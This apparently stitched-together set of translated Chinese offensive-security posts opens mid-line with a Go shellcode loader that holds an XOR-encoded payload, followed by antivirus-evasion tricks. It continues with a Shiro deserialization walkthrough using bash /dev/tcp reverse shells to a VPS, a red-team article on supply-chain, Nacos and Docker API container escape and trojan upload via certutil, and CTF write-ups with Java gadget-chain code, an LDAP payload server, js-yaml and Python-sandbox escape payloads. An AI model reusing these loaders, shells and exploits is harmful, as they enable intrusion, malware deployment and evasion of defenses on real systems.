:='iz/0k4efv3d3dzYmNiclJiE/RqUSP/wlFz/8JW8//CVXP/wFJz94wD09Oka+P0a320sWC3VbVza2vno2draVmiU2Jj/8JVf8NUs/dqcR9g9vfHUCBfz3/3d3dz/ytwMQP3anJ/w/bzP8N1c+dqeUIT+Ivjb8Q/8/dqE6Rr4/RrfbNra+ejZ2tk+XAoY7dDtTfzJOpgKvLzP8N1M+dqcRNvx7PzP8N2s+dqc2/HP/P3anNi82LykuLTYvNi42LT/0m1c2JYiXLzYuLT/8ZZ44iIiIKh13PskAHhkeGRIDdzYhPv6RO/6GNs07AFFwiKI/R r4/RqU6Rrc6Rr42JzYnNs1NIQ7QiKKe5Hd3dy0//rY2z8x2d3c6Rr42JjYmHXQ2JjbNIP7osYiinA4sP/62P0alPv6vOka+JR93RbfzJSU2zZwiWUyIoj/+sT/0tCcdfSg//obNaHd3dx13H/dEd3c+/pc2znN3d3 c2zQIx6fGIoj/+hj/+rT6wt4iIiIg6Rr4lJTbNWnFvDIii8rd48up2d3c/iLh48/t2d3ecxJ6Tdnd3n/WIiIhYBAMWAx4UWB0EWB0GAhIFDlpEWURZRVkEGx4aWRoeGVkdBHdhI6t+16t+1fOvaU170U01iyzbpfay y1/2ar3+Ctaxwg13pLfzUvyPdjEAdyIEEgVaNhASGQNNVzoYDR4bGxZYQllHV18gHhkTGAAETFciTFcgHhkTGAAEVzkjV0JZRkxXEhlaIiRMVwUBTUZZQFlCXlcwEhQcGFhFR0dDRkZHQFcxHgUSERgPWEZZR1dfF g9een138a3Jhf8SuTLptsakGlHpCzEfaWu1GBbwmbCC5spmVmyh80fqMODP2ALXgmypFSNWG7SVeI0OybyhAGGyF4I4kOtTOz1MqEL3Bv8empA2KC6kL9eYO3xP4ukic3tfP++yRqP8gYDC1Aq3kBknsTnkPu3RSJ oVXLtaD3jO3ibMl+cBpDBioUbhePdlxTvlhD+OZ/NDXSwjf1y7hgK70678/6sPEZl2VdgAUuFa17KFDBoUq6Cq9OLDOu5GFZp42AYcsmoQmwd8Xnc2yYfC1SGIoj9Gvs13dzd3Ns93Z3d3Ns43d3d3Ns0v0ySSiKI /5CQkP/6QP/6GP/6tNs93V3d3Pv6ONs1l4f6ViKI/9LNX8rcDwRH8cD92tPK3AqAvLy8/cnd3d3cntJ8IioiIBBIFAR4UEloSAxMVQEMZEVpGREdAQEdHT0ZPWQQfWRYHHhAAWQMSGRQSGQMUBFkUGBp3coKWdw==' decodedShellcode, _ :=base64.StdEncoding.DecodeString(encryptedShellcode) for i :=0; i lt; len(decodedShellcode); i++ { decodedShellcode[i] ^=0x77 } //Get the VirtualAlloc function in kernel32.dll kernel32, _ :=syscall.LoadDLL('kernel32.dll') VirtualAlloc, _ :=kernel32.FindProc('VirtualAlloc') //Allocate memory and write shellcode content allocSize :=uintptr(len(decodedShellcode)) mem, _, _ :=VirtualAlloc.Call(uintptr(0), allocSize, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) if mem==0 { panic('VirtualAlloc failed') } buffer :=(*[0x1_000_000]byte)(unsafe.Pointer(mem))[:allocSize:allocSize] copy(buffer, decodedShellcode) //Execute shellcode syscall.Syscall(mem, 0, 0, 0, 0) } Universal soft-killing skills Remote loading or file separation loading is preferred, but there are also some disadvantages. The former may be traced or blocked by the security device, and the latter requires two files to be more suitable for rights protection. Garbage code filling, perform harmless operations before loading shellcode, interfering with sandbox and soft-killing judgments, or bypass detection by delayed execution or increasing the volume of the program. Choose niche language to write and create loader features. In addition to CS, tools can also use vshell and other self-written C2. One-click generation without killing I am shameless and come to Amway to recommend a github project. Ahem, if you think it's OK, you can click a star⭐ The masterpiece of the master Wang Chao who is not killed is modified by the demon attack https://github.com/wangfly-me/LoaderFly Thousand Machines - Red Team Trojan Free Killing Horse Automatically Generate https://github.com/Pizz33/Qianji Influence of Compilation Parameters go: -race race detection compilation -ldflags '-s -w' Remove compile information -ldflags '-H windowsgui' Hide window garble (obfuscation library): -tiny Delete extra information -literals Confused text -seed=random random seed encoded by base64 For example, if you compile a harmless code, use the -literals parameter. 360 will still report poison. If you don't add it, you won't report poison. package main func main() { //Two numbers to multiply num1 :=5 num2 :=3 result :=0 //Use a for loop to perform multiplication for i :=0; i lt; num2; i++ { result +=num1 } } -H Windows gui parameters will also have a great impact on the exemption. If you need to hide the black box, you can use the following code to replace it (but there are still black boxes under win11) package main import 'github.com/lxn/win' func main(){ win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE) } func box()int{ FreeConsole :=syscall.NewLazyDLL('kernel32.dll').NewProc('FreeConsole') FreeConsole.Call() return 0 } func main() { box() Static feature processing Obfusal go low version https://github.com/boy-hack/go-strip go higher version https://github.com/burrowers/garble mangle Replace String https://github.com/optiv/Mangle Mangle.exe -I xxx.exe -M -O out.exe Comparison before and after mangle processing, it can be found that the feature string of Go compiled is replaced with random characters base64 encoding variable cmd :=exec.Command('rundll32.exe', 'xxx') Key strings are encoded for Base64 and replace variable values at the corresponding position encodedCommand :='cnVuZGxsMzIuZXhl' encodedArguments :='MTExTdGFydA==' //Decode Base64 encoded commands and parameters decodedCommand, _ :=base64.StdEncoding.DecodeString(encodedCommand) decodedArguments, _ :=base64.StdEncoding.DecodeString(encodedArguments) cmd :=exec.Command(string(decodedCommand), string(decodedArguments)) QVM Bypass Add resources 1. Add information such as picture tag name copyright, you can use the following items to add one click https://github.com/Pizz33/360QVM_bypass https://github.com/S9MF/my_script_tools/tree/main/360QVM_bypass-public https://github.com/langsasec/Sign-Sacker Behavioral Characteristics Run the shellcode directly and will usually directly report qvm package main import ( 'syscall' 'unsafe' ) var ( ntdll=syscall.MustLoadDLL('ntdll.dll') VirtualAlloc=kernel32.MustFindProc('VirtualAlloc') RtlCopyMemory=ntdll.MustFindProc('RtlCopyMemory') ) const ( MEM_COMMIT=0x1000 MEM_RESERVE=0x2000 PAGE_EXECUTE_READWRITE=0x40 ) func main() { addr, _, err :=VirtualAlloc.Call(0, uintptr(len(decryt)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) if err !=nil amp;amp; err.Error() !='The operation completed successfully.' { syscall.Exit(0) } _, _, err=RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(amp;decryt[0])), uintptr(len(decryt))) if err !=nil amp;amp; err.Error() !='The operation completed successfully

Get the environment: Pull the mirror to the local $ docker pull medicean/vulapps:s_shiro_1 Start the environment $ docker run -d -p 80:8080 medicean/vulapps:s_shiro_11. Use shiro_attack_2.2 tool to check the target system and found that there is a default key but no utilization chain 2. Use shior_tools.jar to directly detect the target system. After the detection is completed, the executable operation will be returned. java -jar shiro_tool.jar http://10.11.10.108:8081/login.jsp 2. Select 0 and enter the dnslog address. There is an echo through the dnslog test. Here is a note: using http://dnslog.cn/Some sites will intercept, and you can change to multiple dnslog platforms to test. DNSlog has echoes. Next, I will get the shell. Due to fixed thinking, I encountered Linux before. I thought it was Linux, but I didn't use it successfully. At first, I thought it was firewall intercepting. Later, I detected the directory structure and found that it was Windows, so I had to change the payload here. 3. Use ysoserial to open the port on the public network VPS and execute the rebound command java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.JRMPListener 1999 CommonsCollections5 'Bash command after encoding' The encoding content here is in step 4 Pit 1: CommonsCollection1-5 If the shell does not rebound, use it instead 4. Bash rebound command edit https://x.hacking8.com/java-runtime.html//encoded link The following three types of execution commands are selected as appropriate: Pit 2: The bash command executed here first depends on the other party's running system. If it is linxu, try the following three. If it is win, please send the Baidu rebound command separately. bash -i /dev/tcp/VPSIP/7777 01 /bin/bash -i /dev/tcp/VPSIP/7777 01 21 0196;exec 196/dev/tcp/VPSIP/7777; sh 196 196 2196 Here is the second type, ip: is the IP that accepts the shell's vps, port: is the port that uses NC to open the monitoring and rebound to /bin/bash -i /dev/tcp/192.168.14.222/8888 01 21 Windows: java -cp ysoserial-0.0.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils2 'ldap://VPS address :1389/Basic/Command/Base64/d2hvYW1p' d2hvYW1p is the base64 of the command, here is the execution command whoami java -jar JNDIExploit-1.0-SNAPSHOT.jar -i VPS address 5. NC monitoring 6. Enter the ports opened by the vps of the shell and the java-ysoserial-JRMPListener (select 1 here, use JRMPClient to rebound the shell) 7. Successful execution, rebound shell

1. Supply Chain After years of offensive and defensive confrontation, a large number of target units have gradually realized the importance of safety protection. Therefore, they have taken steps to constrain asset exposure as much as possible and double down on the deployment of various security devices. However, safety protection focuses on comprehensiveness and has a clear short-term effect. Once a short-term situation occurs, the entire protection system may collapse instantly. The supply chain of the target unit is often a concentrated reflection of these weaknesses. These supply chains are not only exposed, but also make monitoring and management of them more difficult due to complex relationships. Therefore, attack teams usually choose to start from the supply chain and bypass the target unit's powerful defense system in a roundabout way and gain control over the target unit. Search for 'System Name' Target Unit on Search Engine Find relevant supplier information, and obtain the data and permissions of the target unit by attacking the supplier. 1.1, heapdump leak By penetrating supplier assets, it was found that a heapdump file leak was found in the admin directory of a certain asset. I won't go into details about the use of heapdump here. Many articles have conducted in-depth research on its principles and utilization. RCE can be performed directly under specific circumstances. A large amount of sensitive information is leaked here, and password information is added to the password book. Log in to MinIO and find a large amount of sensitive information about the target unit, and there are also sensitive information about other units. Log in to Nacos, add a large number of configuration files, and add password information to the password book![] Log in to OSS and discover a large amount of sensitive information about the target unit 1.2. The WeChat applet interface is not authorized 1.2.1. Unpacking WeChat applet If you want to unpack the WeChat applet, the first thing you need to do is to get the wxapkg file of the target applet. The wxapkg file is the installation package file format of WeChat applets, which is used to package the applet's code, resources and other necessary files into a separate file. However, the js code and resource files in the wxapkg file in the Windows environment are generally encrypted, and a specially designed decryption tool is required to first decrypt, then unpack and obtain the file contents. Unpacking can be performed directly under iOS and Android platforms. 1.2.1.1. Get wxapkg file When obtaining wxapkg file, it is best to delete the files in the folder first, and then reopen the applet to prevent other files from interfering with it. The iOS wxapkg file storage path is: /var/mobile/Containers/Data/Application/{System UUID}/Library/WechatPrivate/{user hash value}/WeApp/LocalCache/release/{AppID of applet} The Android wxapkg file storage path is: /data/data/com.tencent.mm/MicroMsg/{user hash value}/appbrand/pkg/ The Windows wxapkg file storage path is: C:\Users\{System Username}\Documents\WeChat Files\Applet\{AppID of applet}\ 1.2.1.2. Decryption operation The following two github projects can be decrypted https://github.com/superdashu/pc_wxapkg_decrypt_python https://github.com/BlackTrace/pc_wxapkg_decrypt Decryption principle Successfully decrypted 1.2.1.2. Unpacking operation Tool download link provided by Guoguang boss https://sqlsec.lanzoub.com/i1NEP0mx694f node wuWxapkg.js 1.wxapkg Unpack the applet, get the front-end JS code, and extract it from it to obtain the interface Direct access to the target interface, although the front-end page shows initialization failure However, data has been obtained in the traffic packet, and nearly 10 million sensitive information of target units have been found. 1.3. Web program overreaches Through the above-collected password, a password is knocked out to create an account, but this account has the minimum permission and no operation permissions. Click to search for the organizational structure, and there is no return information at this time Catch the package and remove parentId and orgLevel, and then send the package, you can see the organizational structure of all employees without permission. Click to modify the password, and then add the roleId obtained above to obtain all permissions Get a lot of data 1.4. Official account js leaked password, password can hit the target unit's official account 2. Cloud native security Containerized deployment and microservice architecture provide better flexibility, scalability, maintainability and performance for application development and deployment. It is used by more and more manufacturers. New applications will introduce new attack surfaces, such as container escape, inter-service attacks, API abuse, etc. Attackers can exploit these new entry points to attack applications and data. And managing the authentication and authorization of users and services in a cloud-native environment becomes more complex. Many application developers often overlook or place a secondary position when pursuing the convenience and efficiency of containerized and cloud-native architectures. This directly leads to the fragility of the cloud native environment and is vulnerable to various security threats and attacks. 2.1. Harbor mirror warehouse Harbor is an open source container image repository manager designed to help organizations store, manage and distribute Docker container images, but Harbor has a controversial "vulnerability": any user can directly obtain public images. You can directly pull and download the image file, and you can use scripts to download it in batches. 2.2. Suspected backdoor Obtain the jar package through the image file, obtain sensitive information such as configuration files, decompile the class file of the jar package, and perform code audits to obtain a backdoor-like vulnerability. This interface only needs to use the user name to log in to the system background. Administrator permissions are used to obtain server permissions in combination with file upload. Connect to database through configuration files, etc. 2.3. Docker is not authorized 2.3.1. Registry API unauthorized access In the Docker Registry API, authentication and authorization are usually based on an access token or username and password. If access control permissions are not set correctly, an unauthorized access vulnerability will be caused. The attacker can directly download all mirror containers of the registry repository. Visit the /v2/_catalog interface to view all repository contents https://github.com/Soufaker/docker_v2_catalog Use the above tools to download the mirror directly 2.3.2. Docker Remote API unauthorized access In order to manage container clusters, Docker allows Daemon as a background daemon to execute Docker commands sent through the management interface, using the parameter -H 0.0.0.0:2375 Start Docker When Daemon, port 2375 will be opened to receive commands from the remote Docker client. In this case, port 2375 is exposed as a non-encrypted port and there is no form of authentication. The attacker can directly connect to Docker using the Docker command Daemon, and perform direct operations on the container, and can achieve container escape with the root directory mount. #View container docker -H tcp://target:2375 ps -a #mount the root directory of the host to the mnt directory in the container docker -H tcp://target:2375 run -it -v /:/mnt nginx:latest /bin/bash #Rebound shell echo 'bounce shell command' /mnt/var/spool/cron/crontabs/root 2.4. Nacos Nacos is an open source dynamic service discovery, configuration management and service management platform. It provides functions such as registration center, configuration center and service management to help developers realize service registration, configuration management and service discovery requirements in the microservice architecture. As an open source tool, many vulnerabilities have been disclosed. Unauthorized access: /nacos/v1/auth/users?pageNo=1pageSize=1 Direct view of users Add any user: POST /nacos/v1/auth/users username=password= Modify any user password: curl -X PUT 'http://127.0.0.1:8848/nacos/v1/auth/users?accessToken\=' -H 'User-Agent:Nacos-Server' -d 'username\=test1newPassword\=test2' Weak password: nacos/nacos By scheduling passwords to blast into the background, a large number of configuration files were found, but the sensitive information was encrypted 2.4.1, Jasypt encryption There will be some sensitive information in the configuration file of Spring, such as database passwords, so sometimes we want to encrypt sensitive information. Jasypt is a relatively convenient tool. Jasypt is a Java library used to simplify the encryption and decryption operations of sensitive data (such as passwords, API keys, etc.). The encrypted content needs to be enclosed in ENC(.), and the encrypted password is specified by jasypt.encryptor.password. spring: datasource: username: your-username password: ENC(encrypted-password) Because it must be decrypted, the password needs to be placed in the configuration file or in the code: # application.yml jasypt: encryption: password: Password algorithm: encryption method Decrypt data: Use the decrypt method of the decryptor to decrypt the encrypted data. import org.jasypt.util.text.BasicTextEncryptor; public class DecryptionExample { public static void main(String[] args) { String encryptionKey='yourEncryptionKey'; //Encryption key BasicTextEncryptor textEncryptor=new BasicTextEncryptor(); textEncryptor.setPassword(encryptionKey); String encryptedText='encryptedText'; //Encrypted data String decryptedText=textEncryptor.decrypt(encryptedText); System.out.println('Decrypted Text: ' + decryptedText); } } However, the security of client encryption mainly depends on the protection and trustworthiness of client code. When the password is leaked, the encryption will naturally fail. If you find a jasypt encrypted password in a ncaos file, you can directly decrypt it Successfully connected to OSS Successfully connected to the database Mini program token, take over mini program Dameng Database is a domestic relational database. You can use the following tools to connect. https://github.com/864381832/x-RdbmsSyncTool/releases/tag/v0.0.3 3. Nday 3.1. yongyouNC jsInvoke rce vulnerability Vulnerability Exploit method, create a javax.naming.InitialContext object through the Java reflection mechanism, and connect to the specified IP address and port using the LDAP protocol. Then call the 'saveXStreamConfig' method in the 'nc.itf.iufo.IBaseSPService' service, accepting objects and strings as parameters, achieving the effect of command execution. The command was successfully executed, but the target system has soft-killing, so the file cannot be uploaded directly 3.1.1, certutil certutil is a command line tool in the Windows operating system. It is mainly used to handle certificate and encryption-related operations. The decryption operation of certutil can be bypassed. echo bash64 encoding myfile.jsp Decode using certutil certutil -decode Trojan relative path The decoded Trojan relative path Ice Scorpion is online and CS is launched 3.2. If you open it with two Shiro's hole was fixed, and a front desk information leak vulnerability was found By obtaining the username, use weak password to enter the background, normal permissions Once again, the announcement post guessed the password and successfully logged into the background. The system management permissions were added, and the user was given the highest permissions. Added user login, discover the timed task function, and directly use the timed task to execute commands 3.3, shiro When the target path is accessed, it will first jump to the unified authentication login, resulting in most people ignoring that the path has a shiro deserialization vulnerability. With a try-through mentality, I scanned the shiro, and obtained the permissions directly. Reprinted from the original link: https://forum.butian.net/share/2442

web ai_java First get the account number through the attachment account letter You can get the prompts js and c through base64 or jsfuck. If you audit js, you can see the c function and run it. Get the github project address Find the submission history We found the source code The audit source code found that spring–boot may exist without authorization bypass Fastjson parsing exists in the /post_message/interface under admin's page Check the specific version and find that it is impossible to directly attack the ladp, check the dependencies Discovery introduced shiro. Use SerializedData + LDAP attacks. and dependency-free CB to bounce shells public class CB { public static void setFieldValue(Object obj, String fieldName, Object t value) throws Exception { Field field=obj.getClass().getDeclaredField(fieldName); field.setAccessible(true); field.set(obj, value); } public static Comparator getValue(Object instance) throws NoSuchFiel dException, IllegalAccessException { Class? clazz=instance.getClass(); //Get the Field object of private variables Field privateField=clazz.getDeclaredField('INSTANCE'); //Set access permissions for private variables privateField.setAccessible(true); //Get the value of a private variable Object value=privateField.get(instance); return (Comparator) value; } public static byte[] getPayload() throws Exception { ClassPool pool=ClassPool.getDefault(); CtClass clazz=pool.get(evil.class.getName()); byte[] code=clazz.toBytecode(); TemplatesImpl obj=new TemplatesImpl(); setFieldValue(obj, '_bytecodes', new byte[][]{code}); setFieldValue(obj, '_name', 'tvt'); setFieldValue(obj, '_tfactory', new TransformerFactoryImpl()); final BeanComparator comparator=new BeanComparator(null, getVa lue(new Headers())); Queue queue=new PriorityQueue(2, comparator); queue.add('1'); queue.add('1'); setFieldValue(comparator, 'property', 'outputProperties'); setFieldValue(queue, 'queue', new Object[]{obj, obj}); ByteArrayOutputStream barr=new ByteArrayOutputStream(); ObjectOutputStream oos=new ObjectOutputStream(barr); oos.writeObject(queue); oos.close(); byte[] byteArray=barr.toByteArray(); String base64EncodedData=Base64.getEncoder().encodeToString(by teArray); System.out.println(base64EncodedData); return byteArray; } } public class evil extends AbstractTranslet { public void transform(DOM var1, SerializationHandler[] var2) throws TransletException { } public void transform(DOM var1, DTMAxisIterator var2, SerializationH andler var3) throws TransletException { } public static void main(String[] args) throws Exception { Runtime.getRuntime().exec('bash -c {echo,5L2g5oOz6LWj5LuA5LmI44CC5YaZ6Ieq5bex55qE5ZG95Luk}|{base64,-d}|{bash,-i}'); } public evil() throws Exception { Runtime.getRuntime().exec('bash -c {echo,5L2g5oOz6LWj5LuA5LmI44CC5YaZ6Ieq5bex55qE5ZG95Luk}|{base64,-d}|{bash,-i}'); } } public class LDAPSerialServer { private static final String LDAP_BASE='dc=example,dc=com'; public static void main ( String[] tmp_args ) { String[] args=new String[]{'http://127.0.0.1:8000/#EvilClass'}; int port=7777; try { InMemoryDirectoryServerConfig config=new InMemoryDirectory ServerConfig(LDAP_BASE); config.setListenerConfigs(new InMemoryListenerConfig( 'listen', //$NON-NLS-1$ InetAddress.getByName('0.0.0.0'), //$NON-NLS-1$ port, ServerSocketFactory.getDefault(), SocketFactory.getDefault(), (SSLSocketFactory) SSLSocketFactory.getDefault())); config.addInMemoryOperationInterceptor(new OperationIntercep tor(new URL(args[ 0 ]))); InMemoryDirectoryServer ds=new InMemoryDirectoryServer(con fig); System.out.println('Listening on 0.0.0.0:' + port); //$NON-N LS-1$ ds.startListening(); } catch ( Exception e ) { e.printStackTrace(); } } private static class OperationInterceptor extends InMemoryOperationI nterceptor { private URL codebase; public OperationInterceptor ( URL cb ) { this.codebase=cb; } @Override public void processSearchResult ( InMemoryInterceptedSearchResul t result ) { String base=result.getRequest().getBaseDN(); Entry e=new Entry(base); try { sendResult(result, base, e); } catch ( Exception e1 ) { e1.printStackTrace(); } } protected void sendResult ( InMemoryInterceptedSearchResult resu lt, String base, Entry e ) throws Exception { System.out.println('Send LDAP reference result for ' + base + ' return CB gadgets'); e.addAttribute('javaClassName', 'DeserPayload'); //$NON-NLS- 1$ String base64EncodedData='rO0ABXNyABdqYXZhLnV0aWwuUHJpb3Jp dHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0N vbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbk NvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAAST GphdmEvbGFuZy9TdHJpbmc7eHBzcgA/Y29tLnN1bi54bWwuaW50ZXJuYWwud3MudHJhbnNw b3J0LkhlYWRlcnMkSW5zZW5zaXRpdmVDb21wYXJhdG9yyIEeXDpxA/ECAAB4cHQAEG91dHB 1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybm FsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlc kkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2 YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZ hL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAABdX IAAltCrPMX+AYIVOACAAB4cAAABinK/rq+AAAANA1CgAiACMIACQKACIAJQoAJgAnCgAHA CgHACkHACoBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRl cm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3Nlcml hbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYm xlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEABkxldmlsOwEABHZhcjEBAC1MY29tL 3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAR2YXIyAQBCW0xj b20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmmlhbGl6ZXIvU2VyaWFsaXphdGl vbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAKwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbG FuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hb C9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL9hcGFjaGUveG1sL2ludGVybmFsL3Nlc mlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBADVMY29tL3N1bi9vcmcvYXBhY2hl L3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEABHZhcjMBAEFMY29tL3N1bi9 vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmmlhbGl6YXRpb25IYW5kbG VyOwEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAEYXJncwEAE1tMamF2YS9sY W5nL1N0cmluZzsHACwBAAY8aW5pdD4BAAMoKVYBAApTb3VyY2VGaWxlAQAJZXZpbC5qYXZh BwAtDAAuAC8BAGFiYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppOWtaWFl2ZEdOd0x6UTN MakV4TXk0eE9Ua3VNVFE0THpnNE9EZ2dNRDRtTVE9PX18e2Jhc2U2NCwtZH18e2Jhc2gsLW l9DAAwADEHADIMADMANAwAHgAfAQAEZXZpbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhb i9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29y Zy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZ hL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKC lMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphd mEvbGFuZy9Qcm9jZXNzOwEAA0NDNgEACmdldFBheWxvYWQBAAQoKVtCACEABgAHAAAAAAE AAEACAAJAAIACgAAAD8AAAAAAAAAAAAAAAAAAAGAAEAAAAALAAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0 ADgAAAAAAAQAPABAAAQAAAAEQASAAIAEwAAAAQAUAAEACAAVAAIACgAAAAEkAAAAAAAAAA AAAbEAAAACAAsAAAAGAAEAAAAAAOAAWAAAAQAAQAAAABAA0ADgAAAAAAAAAQAPABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE QAWAAIAAAABABcAGAADABMAAAAEAFAAJABkAGgACAAoAAABAAAIAQAAAA64AAESArYA A1e4AARXsQAAAAIACwAAAA4AAwAAABEACQASAA0AEwAMAAADAABAAAADgAbABwAAAATAAA ABAABAB0AAQAeAB8AAgAKAAAAQAACAAEAAAAOKrcABbgAARICtgADV7EAAAAACAAsAAAAAAAAAAAA MAAAAUAAQAFQANABYADAAAAAWAAQAAAAA4ADQAOAAAAEwAAAAQAAQAdAAEAIAAAAAIAIXB0A AN0dnRwdwEAeHEAfgANeA=='; e.addAttribute('javaSerializedData', Base64.getDecoder().dec ode(base64EncodedData)); result.sendSearchEntry(e); result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); } } } We use CB to encode base64 and do not call directly. We prevent internal API errors when jar packages. Locally, we use CVE-2022-22978 to bypass identity authentication, use fastjson's cache bypass, and implement jndi injection Initiation. signal First of all, this question is because it converts other file formats to yaml format and then yaml.load() will be loaded as a js object. Find the js-yaml document description on github, how to parse the object, the official website also gives an example, here we will directly look at what it can parse into. Discoverable analysis method js-yaml version is 3.14.1, compared with the new version submission https://github.com/nodeca/js-yaml/commit/ee74ce4b4800282b2f23b776be7dc95dfe34db1c This is the last version of the default dangerous mode, which allows you to construct arbitrary JS functions using tags.js/function Then, in the template rendering place, the tostring method of the object will be automatically called So just upload the file yaml file content as the following payload 'name' : { toString:js/function 'function(){ flag=process.mainModule.require('child_process').execSync('cat /fla*').toString(); return flag;}'} Swagger docs 1. Read interface documents to figure out the website function 2. Register a user http://47.108.206.43:40476/api-base/v0/register {'username':'admin','password':'admin'} 3. Log in http://47.108.206.43:40476/api-base/v0/login {'username':'admin','password':'admin'} 4. Read any file Test found that any file reads exist in the /api-base/v0/search interface Read the process http://47.108.206.43:40476/api-base/v0/search?file=./././././proc/1/cmdlinetype=text Read source code location http://47.108.206.43:40476/api-base/v0/search?file=./././././app/run.shtype=text Read source code 5. Code Audit Found that /api-base/v0/search has render_template_string(), which can cause STI to cause Rce, and only need to control the rendering content. There is a pollution similar to the prototype chain in the uapate() function, which can be used to modify the environment.

MISC easyfuzz 1. By trying to enter a string, it is determined that the program's verification rules for input characters are 9 characters, and as long as the correct characters are satisfied, the last return values are all 1111111111, you can get flag Continue to guess boldly and try, and find that the first two characters can be any character, which satisfies 110000000, so the last seven characters can be destroyed. 2. Blast bit by bit, verify that the idea is correct, the last bit is the string 'd' 3. Write a burst script. When the string length is 9 bits and is input, it will be printed with the result that is not "Here is your code coverage: 110000000". The script is as follows from pwn import * from string import printable conn=remote('101.200.122.251', 12199) non_matching_strings=[] for i in range(9): for char in printable: payload='a'*i + char + 'a'*(8-i) print(conn.recvuntil(b'Enter a string (should be less than 10 bytes):')) conn.sendline(payload.encode()) response=conn.recvline().decode().strip() if response !='Here is your code coverage: 110000000': non_matching_strings.append(payload) for string in non_matching_strings: print(string) FLAG: qwb{YouKnowHowToFuzz!} Sign in flag{welcome_to_qwb_2023} Pyjail ! It's myFILTER !!! Python sandbox escapes, after closing, open directly reads environment to get flag {13212}'+(print(open('/proc/1/environ').read()))+' Or use payload: {print(open('/proc/1/environ').read())} flag{61e81b4f-566c-49f5-84dd-d79319fddc82} Pyjail ! It's myRevenge !!! Python sandbox escape Write file import os;os.system("nl fl*hzy") and then use read to read the execution content to get flag All filter characters are bypassed in octal and written in segments {13212}'+(open('wsy', 'a').write('151155160157162'))+'{13212}'+(open('wsy', 'a').write('t 157'))+'{13212}'+(open('wsy', 'a').write('163;157'))+'{13212}'+(open('wsy', 'a').write('163.'))+'{13212}'+(open('wsy', 'a').write('163y'))+'{13212}'+(open('wsy', 'a').write('st'))+'{13212}'+(open('wsy', 'a').write('em('nl 146*hzy')'))+'{13212}'+open('143157de.py','w').write(open('wsy').read())+'{13212}'+(print(open('hzy').read()))+' Or execute the following poc: in turn {globals().update(dict(my_filter=lambda x:1))}''{in''put()}'# {globals().update(dict(len=lambda x:0))}''{in''put()}'# {print(''.__class__.__mro__[1].__subclasses__()[137].__init__.__globals__['__builtins__']['__import__']('os').listdir())} ['flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104', 'server_8F6C72124774022B.py'] {globals().update(dict(my_filter=lambda x:1))}''{in' 'put()}'# {globals(). update(dict(len=lambda x:0))}''{in' 'put()}'# {print (open('flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104'). read())} flag{8f0a4ac2-52d3-4adb-a1a3-47e05997817d} Wabby Wabbo Radio f12 can get the link to wav/static/audios/xh4.wav Refreshed it and found that it was randomly selected to play. Fuzzed it and there are a total of xh1-xh5 and hint1-hint2 and flag.wav The left vocal of each wav is obviously Moss Separate channel, increase amplitude, explain it online website https://morsecode.world/international/decoder/audio-decoder-adaptive.html get: Do you want a flag? Let's listen a little longer.Genshin Impact starts.The weather is really nice today. It's a great day to listen to the Wabby Wabbo radio.If you don't know how to do it, you can go ahead and do something else first.may be flag is png picturedo you know QAM? Nothing else 